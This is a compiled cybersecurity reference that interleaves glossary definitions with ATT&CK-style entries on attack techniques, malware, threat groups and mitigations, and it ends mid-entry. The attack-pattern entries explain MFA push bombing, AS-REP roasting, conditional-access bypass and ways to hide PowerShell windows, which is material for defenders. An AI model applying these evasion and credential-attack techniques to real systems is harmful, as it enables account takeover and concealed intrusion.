Description: Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. 

Some adversaries may also use Automated Collection on removable media.

Term: supplier
Definition: Organization or individual that enters into an agreement with the acquirer or integrator for the supply of a product or service. This includes all suppliers in the supply chain.

Term: reliability
Definition: The probability of performing a specified function without failure under given conditions for a specified period of time.

Term: federation
Definition: A collection of realms (domains) that have established trust among themselves. The level of trust may vary but typically includes authentication and may include authorization.

Term: Analysis
Definition: The examination of acquired data for its significance and probative value to the case.

Term: authenticate
Definition: The process of establishing confidence in the claimed identity of a user or system

Term: Identity Assurance Level (IAL)
Definition: A category that conveys the degree of confidence that the subject’s claimed identity is their real identity.

Term: <em>sig’</em>
Definition: The received digital signature of a randomized message.

Term: United States Government Environment
Definition: A Custom environment that contains federal government systems to be secured according to prescribed configurations as mandated by policy.

Name: Remote Data Storage
Type: course-of-action
Description: Remote Data Storage focuses on moving critical data, such as security logs and sensitive files, to secure, off-host locations to minimize unauthorized access, tampering, or destruction by adversaries. By leveraging remote storage solutions, organizations enhance the protection of forensic evidence, sensitive information, and monitoring data. This mitigation can be implemented through the following measures:

Centralized Log Management:

- Configure endpoints to forward security logs to a centralized log collector or SIEM.
- Use tools like Splunk Graylog, or Security Onion to aggregate and store logs.
- Example command (Linux): `sudo auditd | tee /var/log/audit/audit.log | nc <remote-log-server> 514`

Remote File Storage Solutions:

- Utilize cloud storage solutions like AWS S3, Google Cloud Storage, or Azure Blob Storage for sensitive data.
- Ensure proper encryption at rest and access control policies (IAM roles, ACLs).

Intrusion Detection Log Forwarding:

- Forward logs from IDS/IPS systems (e.g., Zeek/Suricata) to a remote security information system.
- Example for Suricata log forwarding:
`outputs:
 - type: syslog
 protocol: tls
 address: <remote-syslog-server>`

Immutable Backup Configurations:

- Enable immutable storage settings for backups to prevent adversaries from modifying or deleting data.
- Example: AWS S3 Object Lock.

Data Encryption:

- Ensure encryption for sensitive data using AES-256 at rest and TLS 1.2+ for data in transit.
Tools: OpenSSL, BitLocker, LUKS for Linux.

Term: Integrated Circuit Card ID (ICCID)
Definition: The unique serial number assigned to, maintained within, and usually imprinted on the (U)SIM.

Term: Metacharacter
Definition: A character that has some special meaning to a computer program and therefore will not be interpreted properly as part of a literal string.

Term: certificate revocation list (CRL)
Definition: A list of revoked public key certificates by certificate number that includes the revocation date and (possibly) the reason for their revocation.

Term: multi-factor authentication
Definition: The means used to confirm the identity of a user, process, or device (e.g., user password or token).

Term: Rotate
Definition: The process of renewing a certificate in conjunction with a rekey, followed by the process of replacing the existing certificate with the new certificate.

Name: Multi-Factor Authentication Request Generation
Type: attack-pattern
Description: Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to Valid Accounts may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”

Term: Chief Privacy Officer
Definition: The senior organizational official with overall organization-wide responsibility for information privacy issues.

Term: majority judgment algorithm
Definition: An inter-level judgment conflict resolution algorithm where the judgment that occurs most frequently is taken as the result. If more than one judgment occurs the greatest number of times, then the weakest such judgment is the result.

Term: key transport
Definition: The transport of key information from one entity (the sender) to one or more other entities (the receivers). The sender may have generated the key information or acquired it from another source as part of a separate process. The key information may be distributed manually or using automated key transport mechanisms.

Name: Brute Force
Type: attack-pattern
Description: Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to Valid Accounts within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as OS Credential Dumping, Account Discovery, or Password Policy Discovery. Adversaries may also combine brute forcing activity with behaviors such as External Remote Services as part of Initial Access. 

If an adversary guesses the correct password but fails to login to a compromised account due to location-based conditional access policies, they may change their infrastructure until they match the victim’s location and therefore bypass those policies.

Name: Hidden Window
Type: attack-pattern
Description: Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.

On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.

Similarly, on Windows there are a variety of features in scripting languages, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.

The Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.

In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process. All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session, will be invisible to other desktops windows.

Adversaries may also leverage cmd.exe as a parent process, and then utilize a LOLBin, such as DeviceCredentialDeployment.exe, to hide windows.

Term: malware
Definition: A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system.

Term: IUT
Definition: Implementation Under Test

Term: access control
Definition: The process of granting or denying specific requests for obtaining and using information and related information processing services.

Term: focused testing
Definition: A test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Also known as gray box testing.

Name: PingPull
Type: malware
Description: PingPull is a remote access Trojan (RAT) written in Visual C++ that has been used by GALLIUM since at least June 2022. PingPull has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.

Term: Organizational Information Security Continuous Monitoring
Definition: Ongoing monitoring sufficient to ensure and assure effectiveness of security controls related to systems, networks, and cyberspace, by assessing security control implementation and organizational security status in accordance with organizational risk tolerance – and within a reporting structure designed to make real-time, data-driven risk management decisions.

Term: supportive relationship mapping
Definition: A concept relationship style that identifies how one concept can or does help achieve another concept.

Term: Data integrity authentication
Definition: The process of determining the integrity of the data; also called integrity authentication or integrity verification.

Name: GCMAN
Type: intrusion-set
Description: GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.

Term: seal of approval
Definition: A single label indicating a product has met a baseline standard.

Term: IMEI
Definition: a unique number programmed into GSM and UMTS mobile phones.

Term: GNSS
Definition: GNSS collectively refers to the worldwide positioning, navigation, and timing (PNT) determination capability available from one or more satellite constellations. Each GNSS system employs a constellation of satellites that operate in conjunction with a network of ground stations. Receivers and system integrity monitoring are augmented as necessary to support the required position, navigation, and timing performance for the intended operation.

Term: <em>Key3</em>
Definition: The third component of a TDEA key.

Term: individual accountability
Definition: Ability to associate positively the identity of a user with the time, method, and degree of access to an information system.

Term: cookie
Definition: A piece of state information supplied by a Web server to a browser, in a response for a requested resource, for the browser to store temporarily and return to the server on any subsequent visits or requests.

Term: media
Definition: Physical devices or writing surfaces including, but not limited to, magnetic tapes, optical disks, magnetic disks, Large-Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within an information system.

Term: damage
Definition: Harm caused to something in such a way as to reduce or destroy its value, usefulness, or normal function.

Term: context handler
Definition: Executes the workflow logic that defines the order in which policy and attributes are retrieved and enforced.

Term: resource
Definition: An entity to be protected from unauthorized use.

Term: Kerberos
Definition: A means of verifying the identities of principals on an open network. Kerberos accomplishes this without relying on the authentication, trustworthiness, or physical security of hosts while assuming all packets can be read, modified and inserted at will. Kerberos uses a trust broker model and symmetric cryptography to provide authentication and authorization of users and systems on the network.

Name: APT3
Type: intrusion-set
Description: APT3 is a China-based threat group that researchers have attributed to China's Ministry of State Security. This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.

Term: boundary protection
Definition: Monitoring and control of communications at the external boundary of an information system to prevent and detect malicious and other unauthorized communications, through the use of boundary protection devices (e.g. gateways, routers, firewalls, guards, encrypted tunnels).

Term: calibration
Definition: A comparison between a device under test and an established standard, such as UTC(NIST). When the calibration is finished, it should be possible to state the estimated time offset and/or frequency offset of the device under test with respect to the standard, as well as the measurement uncertainty. Calibrations can be absolute or relative. Absolute calibrations are not biased by the calibration reference and would, therefore, be more reproducible. However, absolute calibrations can be more complex to determine. The bias in relative calibrations would be consistent if all the devices in the system are calibrated against the same calibration reference. Calibrations may also be performed relative to other devices without reference to an absolute standard. Relative calibrations are generally simpler to perform than absolute calibrations.

Term: Hardware Device
Definition: A discrete physical component of an information technology system or infrastructure. A hardware device may or may not be a computing device (e.g., a network hub, a webcam, a keyboard, a mouse).

Name: AS-REP Roasting
Type: attack-pattern
Description: Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages. 

Preauthentication offers protection against offline Password Cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline Password Cracking attacks similarly to Kerberoasting and expose plaintext credentials. 

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like PowerShell with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. 

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.

Term: Digital Signature Algorithm
Definition: Digital Signature Algorithm specified in [FIPS 186].

Term: interchangeable
Definition: The ability to combine signals from multiple PNT data sources into a single PNT solution, as well as the ability to provide a solution from an alternative source when a primary source is not available.

Term: account recovery
Definition: The ability to regain ownership of a subscriber account and its associated information and privileges.

Term: security control
Definition: The management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for a system to protect the confidentiality, integrity, and availability of the system, its components, processes, and data.

Term: system boundary
Definition: See Authorization Boundary.

Term: certificate-related information
Definition: Information, such as subscriber’s postal address, that is not included in a certificate. May be used by a certification authority (CA) managing certificates.

Term: security specification
Definition: The requirements for the security-relevant portion of the system.
Note: The security specification may be provided as a separate document or may be captured with a broader specification.

Term: Availability Impact
Definition: measures the potential impact to availability of a successfully exploited misuse vulnerability. Availability refers to the accessibility of information resources.

Term: identity proofing
Definition: The process by which a CSP and a Registration Authority (RA) collect and verify information about a person for the purpose of issuing credentials to that person.

Term: boundary
Definition: Physical or logical perimeter of a system. See also authorization boundary and interface.

Term: IETF
Definition: The internet standards organization made up of network designers, operators, vendors, and researchers that defines protocol standards (e.g., IP, TCP, DNS) through process of collaboration and consensus.

Name: HyperStack
Type: malware
Description: HyperStack is a RPC-based backdoor used by Turla since at least 2018. HyperStack has similarities to other backdoors used by Turla including Carbon.

Name: Skidmap
Type: malware
Description: Skidmap is a kernel-mode rootkit used for cryptocurrency mining.

Name: IP Addresses
Type: attack-pattern
Description: Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Term: Entity authentication
Definition: The process of providing assurance about the identity of an entity interacting with a system (e.g., to access a resource). Also see Source authentication.

Term: Qualitative Assessment
Definition: Use of a set of methods, principles, or rules for assessing risk based on nonnumerical categories or levels.

Term: Hash- Based Message Authentication Code
Definition: Keyed-hash Message Authentication Code (as specified in FIPS 198-1).

Name: Carbanak
Type: malware
Description: Carbanak is a full-featured, remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines.

Term: <em>w</em>
Definition: In LMS, the number of bits from the hash or checksum used in a single Winternitz chain. The length of a Winternitz chain is 2w. (Note that using a Winternitz parameter of w = 4 in LMS would be comparable to using a parameter of w = 16 in XMSS.)

Term: verifier
Definition: The Bluetooth device that validates the identity of the claimant during the Bluetooth connection process.

Term: digital transaction
Definition: A discrete event between a user and a system that supports a business or programmatic purpose. A government digital system may have multiple categories or types of transactions, which may require separate analysis within the overall digital identity risk assessment.

Term: security specification
Definition: An information item that identifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other expected characteristics of a system, service, or process.

Term: PRNG
Definition: A deterministic computational process that has one or more inputs called "seeds", and it outputs a sequence of values that appears to be random according to specified statistical tests. A cryptographic PRNG has the additional property that the output is unpredictable, given that the seed is not known.

Term: PIA
Definition: An analysis of how information is handled: (i) to ensure handling conforms to applicable legal, regulatory, and policy requirements regarding privacy; (ii) to determine the risks and effects of collecting, maintaining, and disseminating information in identifiable form in an electronic information system; and (iii) to examine and evaluate protections and alternative processes for handling information to mitigate potential privacy risks.

Term: Qualitative Assessment
Definition: The use of a set of methods, principles, or rules for assessing risk based on nonnumerical categories or levels.

Term: Bitstring
Definition: A sequence of bits.

Term: exclusive-OR
Definition: A mathematical operation; the symbol⊕, defined as: 0⊕ 0 = 0 1⊕ 0 = 1 0⊕ 1 = 1 1⊕ 1 = 0 Equivalent to binary addition without carry.

Term: senior agency information security officer (SAISO)
Definition: See senior agency information security officer (SAISO).

Term: Kerberos
Definition: An authentication system developed at the Massachusetts Institute of Technology (MIT). Kerberos is designed to enable two parties to exchange private information across a public network.

Term: Standard Normal Cumulative Distribution Function
Definition: See the definition in Section 5.5.3. This is the normal function for mean = 0 and variance = 1.

Term: risk management strategy
Definition: Strategy that addresses how organizations intend to assess risk, respond to risk, and monitor risk—making explicit and transparent the risk perceptions that organizations routinely use in making both investment and operational decisions.

Name: Neoichor
Type: malware
Description: Neoichor is C2 malware used by Ke3chang since at least 2019; similar malware families used by the group include Leeson and Numbldea.

Name: BoomBox
Type: malware
Description: BoomBox is a downloader responsible for executing next stage components that has been used by APT29 since at least 2021.

Term: signaling rate
Definition: The signaling rate of a digital signal is defined as the reciprocal of the bit width (1/bit width). The signaling rate is used to determine the frequency range of electrical isolation.

Term: exclusive-OR
Definition: Bit-wise exclusive-or. A mathematical operation that is defined as: 
0⊕ 0 = 0
0⊕ 1 = 1
1⊕ 0 = 1 , and
1⊕ 1 = 0

Term: attacker
Definition: person seeking to exploit potential vulnerabilities of a system

Term: purge
Definition: Rendering sanitized data unrecoverable by laboratory attack methods.

Term: Byte String
Definition: An ordered sequence of bytes.

Term: nonce
Definition: A varying value that has, at most, a negligible chance of repeating; for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: Location Information (LOCI)
Definition: the Location Area Identifier (LAI) of the phone’s current location, continuously maintained on the SIM when the phone is active and saved whenever the phone is turned off.

Name: Delete Cloud Instance
Type: attack-pattern
Description: An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also Create Cloud Instance and later terminate the instance after achieving their objectives.

Term: approved
Definition: FIPS-approved or NIST-recommended: an algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation.

Term: OLIR Template
Definition: A spreadsheet that contains the fields necessary for creating a well- formed Informative Reference for submission to the OLIR Program. It is available on the Cybersecurity Framework website and serves as the starting point for the Developer.

Term: APT
Definition: An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders’ efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives.

Name: Data Encoding
Type: attack-pattern
Description: Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems. Some data encoding systems may also result in data compression, such as gzip.

Term: Uniform Resource Locator
Definition: A reference to a web resource that specifies its location on a computer network and a mechanism for retrieving it. A typical URL could have the form http://www.example.com/index.html, which indicates a protocol (http), a host name (www.example.com), and a file name (index.html). Also sometimes referred to as a web address.

Term: non-adversarial threat
Definition: A threat associated with accident or human error, structural failure, or environmental causes. Note: See Appendix D of [SP 800-30].

Term: role-based access control (RBAC)
Definition: A model for controlling access to resources where permitted actions on resources are identified with roles rather than with individual subject identities.

Term: information security program plan
Definition: Formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management controls and common controls in place or planned for meeting those requirements. [SP800‑37] from [OMBA‑130]

Term: Address
Definition: A short, alphanumeric string derived from a user’s public key using a hash function, with additional data to detect errors. Addresses are used to send and receive digital assets.

Name: File and Directory Discovery
Type: attack-pattern
Description: Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>. Custom tools may also be used to gather file and directory information and interact with the Native API. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).

Some files and directories may require elevated or specific user permissions to access.

Name: Turla
Type: intrusion-set
Description: Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.

Name: WinMM
Type: malware
Description: WinMM is a full-featured, simple backdoor used by Naikon.

Term: MAC tag
Definition: Data obtained from the output of a MAC algorithm (possibly by truncation) that can be used by an entity to securely verify the integrity and origin of the information used as input to the MAC algorithm.

Name: Indian Critical Infrastructure Intrusions
Type: campaign
Description: Indian Critical Infrastructure Intrusions is a sequence of intrusions from 2021 through early 2022 linked to People’s Republic of China (PRC) threat actors, particularly RedEcho and Threat Activity Group 38 (TAG38). The intrusions appear focused on IT system breach in Indian electric utility entities and logistics firms, as well as potentially managed service providers operating within India. Although focused on OT-operating entities, there is no evidence this campaign was able to progress beyond IT breach and information gathering to OT environment access.

Term: privacy continuous monitoring strategy
Definition: Formal document that catalogs the available privacy controls implemented at an agency across the agency risk management tiers and ensures that the controls are effectively monitored on an ongoing basis by assigning an agency- defined assessment frequency to each control that is sufficient to ensure compliance with applicable privacy requirements and to manage privacy risks.

Name: Small Sieve
Type: malware
Description: Small Sieve is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by MuddyWater since at least January 2022.

Security researchers have also noted Small Sieve's use by UNC3313, which may be associated with MuddyWater.

Name: Operation AkaiRyū
Type: campaign
Description: Operation AkaiRyū (Japanese for RedDragon) was a cyberespionage spearphishing campaign conducted by MirrorFace between June and September 2024 against entities in Japan and Central Europe. Operation AkaiRyū notably included the first reported targeting of a European entity by MirrorFace, as well as their use of UPPERCUT, which was thought to be exclusive to menuPass.

Term: TOFB
Definition: TDEA Output Feedback Mode of Operation

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the chief information officer (CIO) responsibilities under the Federal Information Security Management Act (FISMA) and serving as the CIO’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. 
Note: Also known as senior information security officer (SISO) or chief information security officer (CISO).

Term: Access Control Policy
Definition: an access control paradigm whereby access rights are granted to users through the use of policies which combine attributes together. The policies can use any type of attributes (user attributes, resource attributes, environment attribute etc.

Term: Identity, Credential, and Access Management (ICAM)
Definition: Programs, processes, technologies, and personnel used to create trusted digital identity representations of individuals and non-person entities (NPEs), bind those identities to credentials that may serve as a proxy for the individual or NPE in access transactions, and leverage the credentials to provide authorized access to an agency's resources.

Term: control assessment report
Definition: Documentation of the results of security and privacy control assessments, including information based on assessor findings and recommendations for correcting deficiencies in the implemented controls.

Term: hash function
Definition: <p>A function that maps a bit string of arbitrary length to a fixed-length bit string. Depending upon the relying application, the security strength that can be supported by a hash function is typically measured by the extent to which it possesses one or more of the following properties</p><p>1. (Collision resistance) It is computationally infeasible to find any two distinct inputs that map to the same output.</p><p>2. (Preimage resistance) Given a randomly chosen target output, it is computationally infeasible to find any input that maps to that output. (This property is called the one-way property.)</p><p>3. (Second preimage resistance) Given one input value, it is computationally infeasible to find a second (distinct) input value that maps to the same output as the first value.</p><p>This Recommendation uses the strength of the preimage resistance of a hash function as a contributing factor when determining the security strength provided by a key-derivation method.</p><p>Approved hash functions are specified in [FIPS 180] and [FIPS 202].</p>

Term: Attribute Value
Definition: A complete statement asserting a property of a subscriber, independent of format. For example, for the attribute “birthday,” a value could be “12/1/1980” or “December 1, 1980.”

Name: TEMP.Veles
Type: intrusion-set
Description: TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.

Term: chain of trust
Definition: An interoperable data format for PIV enrollment records that facilitates the import and export of records between PIV Card issuers.

Name: Behavior Prevention on Endpoint
Type: course-of-action
Description: Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack. This mitigation can be implemented through the following measures:

Suspicious Process Behavior:

- Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
- Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.

Unauthorized File Access:

- Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
- Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.

Abnormal API Calls:

- Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
- Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like `OpenProcess` and `WriteProcessMemory` and terminates the offending process.

Exploit Prevention:

- Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
- Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process.

Name: Digital Certificates
Type: attack-pattern
Description: Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if added to the root of trust (i.e. Install Root Certificate).

After creating a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.

Term: applicant
Definition: A party undergoing the processes of registration and identity proofing.

Term: <em>Tlen</em>
Definition: The bit length of the MAC.

Term: Examination
Definition: A technical review that makes the evidence visible and suitable for analysis; tests performed on the evidence to determine the presence or absence of specific data.

Term: testing data control
Definition: A capability with which an attacker controls the testing data input to the machine learning model.

Term: VPN
Definition: A virtual network built on top of existing networks that can provide a secure communications mechanism for data and IP information transmitted between networks.

Term: Binary Sequence
Definition: A sequence of zeroes and ones.

Term: security requirement
Definition: A requirement levied on an information system or an organization that is derived from applicable laws, executive orders, directives, policies, standards, instructions, regulations, procedures, and/or mission/business needs to ensure the confidentiality, integrity, and availability of information that is being processed, stored, or transmitted. Note: Security requirements can be used in a variety of contects from high-level policy activies to low-level implementation activities in system development and engineering disciplines.

Term: Condition coverage
Definition: The percentage of conditions within decision expressions that have been evaluated to both true and false. Note that 100% condition coverage does not guarantee 100% decision coverage. For example, “if (A || B) {do something} else {do something else}” is tested with [0 1], [1 0], then A and B will both have been evaluated to 0 and 1, but the else branch will not be taken because neither test leaves both A and B false.

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that uses an approved security function and a symmetric key to detect both accidental and intentional modifications of data.

Term: Predictability
Definition: Enabling reliable assumptions by individuals, owners, and operators about PII and its processing by an information system.

Term: Transaction
Definition: A recording of an event, such as the transfer of assets (digital currency, units of inventory, etc.) between parties, or the creation of new assets.

Term: selection operation
Definition: See assignment operation and organization-defined parameter.

Term: Signature generation
Definition: The process of using a digital signature algorithm and a private key to generate a digital signature on data.

Term: Reward system
Definition: See Incentive Mechanism

Term: Application Translation
Definition: A function that converts information from one protocol to another.

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that: (i) security risk-related considerations for individual information systems, including the authorization decisions for those systems, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and (ii) managing risk from individual information systems is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission/business success.

Term: Manager
Definition: An individual responsible for network resources (people, data, processing capability) who is charged with conducting business of an organization.

Term: nonce
Definition: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols are not repeated until the authentication keys are changed. Otherwise, there is a possibility of a replay attack.

Term: RBG seed
Definition: A string of bits that is used to initialize a DRBG. Also just called a Seed.

Term: security requirement
Definition: A requirement that specifies the functional, assurance, and strength characteristics for a mechanism, system, or system element.

Term: stakeholder
Definition: Individual, team, organization, or classes thereof, having an interest in a system.

Term: cyber incident
Definition: Any observable occurrence involving computing assets, including physical and virtual platforms, networks, services, and cloud environments.

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms), holds plaintext keys and uses them for performing cryptographic operations, and is contained within a cryptographic module boundary. This Profile requires the use of a validated cryptographic module as specified in [FIPS 140].

Term: network access
Definition: Access to a system by a user (or a process acting on behalf of a user) communicating through a network, including a local area network, a wide area network, and the Internet.

Name: Digital Certificates
Type: attack-pattern
Description: Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if the certificate is trusted or otherwise added to the root of trust (i.e. Install Root Certificate). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities. Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.

After obtaining a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.

Term: CP
Definition: See Information System Contingency Plan.

Name: Wizard Spider
Type: intrusion-set
Description: Wizard Spider is a Russia-based financially motivated threat group originally known for the creation and deployment of TrickBot since at least 2016. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.

Term: Assurance of possession
Definition: Confidence that an entity possesses a private key and any associated keying material.

Term: ISCM Capability
Definition: See ISCM Capability.

Term: test key
Definition: Key intended for testing of COMSEC equipment or systems. If intended for off-the-air, in-shop use, such key is called maintenance key.

Term: Capability, Manage and Assess Risk
Definition: The program and supporting processes to manage information security risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, and includes: 
(i) establishing the context for risk-related activities; 
(ii) assessing risk; 
(iii) responding to risk once determined; and 
(iv) monitoring risk over time.

Term: Mode of Operation (Mode)
Definition: See “block cipher mode of operation.”

Term: Open Pretty Good Privacy (OpenPGP)
